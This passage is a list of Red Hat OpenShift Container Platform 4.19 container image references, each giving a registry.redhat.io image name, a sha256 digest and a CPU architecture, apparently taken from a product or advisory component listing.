"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
